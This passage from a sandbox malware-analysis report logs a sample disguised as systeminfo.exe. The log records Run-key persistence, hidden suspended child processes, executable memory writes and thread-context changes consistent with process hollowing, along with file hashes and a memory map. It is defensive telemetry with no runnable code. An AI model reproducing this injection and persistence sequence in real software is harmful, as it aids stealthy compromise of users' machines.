Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x3df814 True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x3df814 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x752adbeb True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x752a9894 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x752a9cee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x75aa6aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75a01700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75a2828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75a04435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75a05929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75a23102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75a054ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75a04442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75a01245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75a014b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x75a1b6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x75a842ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75a05a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75a1eceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75a011c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75a014e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75a014c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75a01809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x757bae5f True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x7570a4b4 True 1
Fn
System (13)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 1
Fn
Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Get Time type = Local Time, time = 2017-11-28 18:18:22 (Local Time) True 6
Fn
Get Time type = Ticks, time = 103678 True 4
Fn
Mutex (6)
+
Operation Additional Information Success Count Logfile
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Fn
Process #7: systeminfo.exe
(Host: 315, Network: 231)
+
Information Value
ID #7
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:41, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:42
OS Process Information
+
Information Value
PID 0x81c
Parent PID 0xbfc (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 3F0
0x 82C
0x 84C
0x 864
0x 874
0x 884
0x 894
0x 8A4
0x 8B4
0x 8C8
0x 788
0x 720
0x 644
0x 51C
0x 968
0x 2AC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x00081fff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0009dfff Private Memory Readable, Writable, Executable True False False
private_0x00000000000a0000 0x000a0000 0x000adfff Private Memory Readable, Writable True False False
private_0x00000000000b0000 0x000b0000 0x000bffff Private Memory Readable, Writable, Executable True False False
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000000d0000 0x000d0000 0x0010ffff Private Memory Readable, Writable True False False
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000110000 0x00110000 0x00117fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000120000 0x00120000 0x00127fff Pagefile Backed Memory Readable, Writable True False False
windowsshell.manifest 0x00120000 0x00120fff Memory Mapped File Readable False False False
index.dat 0x00120000 0x0012bfff Memory Mapped File Readable, Writable True False False
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable True False False
private_0x0000000000140000 0x00140000 0x001bffff Private Memory Readable, Writable True False False
locale.nls 0x001c0000 0x00226fff Memory Mapped File Readable False False False
rsaenh.dll 0x00230000 0x0026bfff Memory Mapped File Readable False False False
rsaenh.dll 0x00230000 0x0026bfff Memory Mapped File Readable False False False
index.dat 0x00230000 0x00237fff Memory Mapped File Readable, Writable True False False
index.dat 0x00240000 0x0024ffff Memory Mapped File Readable, Writable True False False
private_0x0000000000250000 0x00250000 0x00250fff Private Memory Readable, Writable True False False
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory Readable True False False
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False
private_0x0000000000270000 0x00270000 0x0036ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000370000 0x00370000 0x00370fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000380000 0x00380000 0x00380fff Pagefile Backed Memory Readable True False False
private_0x00000000003a0000 0x003a0000 0x0049ffff Private Memory Readable, Writable True False False
pagefile_0x00000000004a0000 0x004a0000 0x0057efff Pagefile Backed Memory Readable True False False
private_0x0000000000590000 0x00590000 0x0059ffff Private Memory Readable, Writable True False False
private_0x00000000005f0000 0x005f0000 0x005fffff Private Memory Readable, Writable True False False
pagefile_0x0000000000600000 0x00600000 0x00787fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000790000 0x00790000 0x00910fff Pagefile Backed Memory Readable True False False
private_0x0000000000920000 0x00920000 0x00b1ffff Private Memory Readable, Writable True False False
private_0x0000000000920000 0x00920000 0x00a1ffff Private Memory Readable, Writable True False False
private_0x0000000000a80000 0x00a80000 0x00abffff Private Memory Readable, Writable True False False
private_0x0000000000ae0000 0x00ae0000 0x00b1ffff Private Memory Readable, Writable True False False
private_0x0000000000b80000 0x00b80000 0x00bbffff Private Memory Readable, Writable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x02000000 0x022cefff Memory Mapped File Readable False False False
private_0x00000000022d0000 0x022d0000 0x026a0fff Private Memory Readable, Writable True False False
private_0x00000000022e0000 0x022e0000 0x0231ffff Private Memory Readable, Writable True False False
private_0x0000000002340000 0x02340000 0x0237ffff Private Memory Readable, Writable True False False
private_0x00000000023a0000 0x023a0000 0x0249ffff Private Memory Readable, Writable True False False
private_0x00000000024a0000 0x024a0000 0x0259ffff Private Memory Readable, Writable True False False
private_0x00000000024a0000 0x024a0000 0x0251ffff Private Memory Readable, Writable True False False
private_0x00000000024a0000 0x024a0000 0x024dffff Private Memory Readable, Writable True False False
private_0x0000000002510000 0x02510000 0x0251ffff Private Memory Readable, Writable True False False
private_0x0000000002560000 0x02560000 0x0259ffff Private Memory Readable, Writable True False False
private_0x0000000002640000 0x02640000 0x0273ffff Private Memory Readable, Writable True False False
private_0x0000000002740000 0x02740000 0x0277ffff Private Memory Readable, Writable True False False
private_0x0000000002810000 0x02810000 0x0290ffff Private Memory Readable, Writable True False False
private_0x0000000002910000 0x02910000 0x02b3ffff Private Memory Readable, Writable True False False
private_0x0000000002930000 0x02930000 0x02a2ffff Private Memory Readable, Writable True False False
private_0x0000000002a30000 0x02a30000 0x02afffff Private Memory Readable, Writable True False False
private_0x0000000002a30000 0x02a30000 0x02a6ffff Private Memory Readable, Writable True False False
private_0x0000000002b00000 0x02b00000 0x02b3ffff Private Memory Readable, Writable True False False
private_0x0000000002b40000 0x02b40000 0x02c3ffff Private Memory Readable, Writable True False False
private_0x0000000002cc0000 0x02cc0000 0x02dbffff Private Memory Readable, Writable True False False
private_0x0000000002fa0000 0x02fa0000 0x02fdffff Private Memory Readable, Writable True False False
private_0x00000000030d0000 0x030d0000 0x031cffff Private Memory Readable, Writable True False False
dhcpcsvc.dll 0x74210000 0x74221fff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x74230000 0x74237fff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x74240000 0x7424dfff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x74250000 0x742a9fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x742b0000 0x742e7fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742f0000 0x7448dfff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x744d0000 0x744d5fff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x744e0000 0x744e4fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x744f0000 0x744f7fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74500000 0x7453bfff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x74540000 0x74551fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x74560000 0x7456ffff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x74570000 0x74575fff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x74580000 0x7458ffff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x74590000 0x74595fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x745a0000 0x745acfff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x745b0000 0x745c4fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x745d0000 0x74621fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x74650000 0x746cffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x74790000 0x747abfff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x747b0000 0x747f3fff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x74800000 0x74850fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x74860000 0x74891fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x748a0000 0x748b3fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x748c0000 0x748c6fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74b00000 0x74b20fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74b30000 0x74b6afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74b70000 0x74b85fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74b90000 0x74ba6fff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74bb0000 0x74bbcfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x74bc0000 0x74bcafff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x74ec0000 0x750bafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75350000 0x75444fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x75650000 0x756d2fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x75890000 0x758c4fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x76b00000 0x76b02fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x76b10000 0x76b54fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76c40000 0x76d75fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x77240000 0x77245fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 63 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\programdata\fb6f.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\fb2f.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\fb70.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\fb70.tmp 0.11 KB (112 bytes) MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f
SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345
False
c:\programdata\fb2f.tmp 0.08 KB (87 bytes) MD5: 0b5111a9cc6baab51851f1702403b937
SHA1: e95885d85bd47cc19e1181b046995ccd975fd59d
SHA256: 62a0536a5b9d1e3cb2af52a5630c330cd30da7398bcddf4a17af0913fc502819
False
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 48.00 KB (49152 bytes) MD5: f3393556a7ada08dd53548e19467e11f
SHA1: 6109040bf1ee76ce83597326228dd6ac1668f104
SHA256: f066cb2b19cc806d84ebeb3649da5050070a6e608156c217a5f8d1149ff8dee4
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB (32768 bytes) MD5: 50d06047bd7adf336c6a8dd390506ff3
SHA1: ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582
SHA256: c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e
False
c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB (65536 bytes) MD5: 009e3e410a28a8e518f2c6ac83306724
SHA1: 121b97b6c22d60d1dedc8d0160c86e8b9afa5089
SHA256: 960f4e97d46b9ddaece01a9def1d6fe466103fa57203483b13c8eb8c26a7b6bc
False
Host Behavior
File (14)
+
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\FB6F.tmp desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\ProgramData\FB70.tmp desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\ProgramData\FB2F.tmp desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create Temp File C:\ProgramData\FB2F.tmp path = C:\ProgramData True 1
Fn
Create Temp File C:\ProgramData\FB70.tmp path = C:\ProgramData True 1
Fn
Create Temp File C:\ProgramData\FB6F.tmp path = C:\ProgramData True 1
Fn
Get Info C:\ProgramData\FB70.tmp type = size True 1
Fn
Get Info C:\ProgramData\FB2F.tmp type = size True 1
Fn
Delete C:\ProgramData\FB6F.tmp - True 1
Fn
Delete C:\ProgramData\FB2F.tmp - True 2
Fn
Delete C:\ProgramData\FB70.tmp - True 2
Fn
Delete C:\ProgramData\FB6F.tmp - False 1
Fn
Registry (20)
+
Operation Key Additional Information Success Count Logfile
Write Value - value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ True 20
Fn
Process (3)
+
Operation Process Additional Information Success Count Logfile
Create "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" os_pid = 0x674, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Create "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" os_pid = 0xa98, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Create "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" os_pid = 0x66c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Thread (9)
+
Operation Process Additional Information Success Count Logfile
Get Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x884 True 1
Fn
Get Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x8b4 True 1
Fn
Get Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x84c True 1
Fn
Set Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x884 True 1
Fn
Set Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x8b4 True 1
Fn
Set Context c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x84c True 1
Fn
Resume c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x884 True 1
Fn
Resume c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x8b4 True 1
Fn
Resume c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe os_tid = 0x84c True 1
Fn
Memory (15)
+
Operation Process Additional Information Success Count Logfile
Allocate "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 102400 True 1
Fn
Allocate "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 True 1
Fn
Allocate "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Get Info "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536 True 1
Fn
Get Info "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536 True 1
Fn
Get Info "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536 True 1
Fn
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" address = 0x400000, size = 102400 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" address = 0x7efde008, size = 4 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" address = 0x7efdf010, size = 4 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" address = 0x400000, size = 372736 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" address = 0x7efde008, size = 4 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" address = 0x7efdf010, size = 4 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" address = 0x400000, size = 114688 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" address = 0x7efde008, size = 4 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" address = 0x7efdf010, size = 4 True 1
Fn
Data
Module (90)
+
Operation Module Additional Information Success Count Logfile
Load msvcrt.dll base_address = 0x752a0000 True 1
Fn
Load KERNEL32.dll base_address = 0x759f0000 True 1
Fn
Load USER32.dll base_address = 0x75790000 True 1
Fn
Load ADVAPI32.dll base_address = 0x756e0000 True 1
Fn
Load advapi32.dll base_address = 0x756e0000 True 4
Fn
Load crypt32.dll base_address = 0x758d0000 True 3
Fn
Load shell32.dll base_address = 0x75c50000 True 3
Fn
Load urlmon.dll base_address = 0x76c40000 True 3
Fn
Load userenv.dll base_address = 0x74b90000 True 4
Fn
Load wininet.dll base_address = 0x75350000 True 3
Fn
Load wtsapi32.dll base_address = 0x74bb0000 True 4
Fn
Load mpr.dll base_address = 0x741e0000 True 1
Fn
Load netapi32.dll base_address = 0x741c0000 True 1
Fn
Load SAMCLI.DLL base_address = 0x74170000 True 1
Fn
Get Filename - process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 True 22
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x36f9bc True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x36f9f4 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x752adbeb True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x752a9894 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x752a9cee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x75aa6aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75a01700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75a2828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75a04435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75a05929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75a23102 True 1
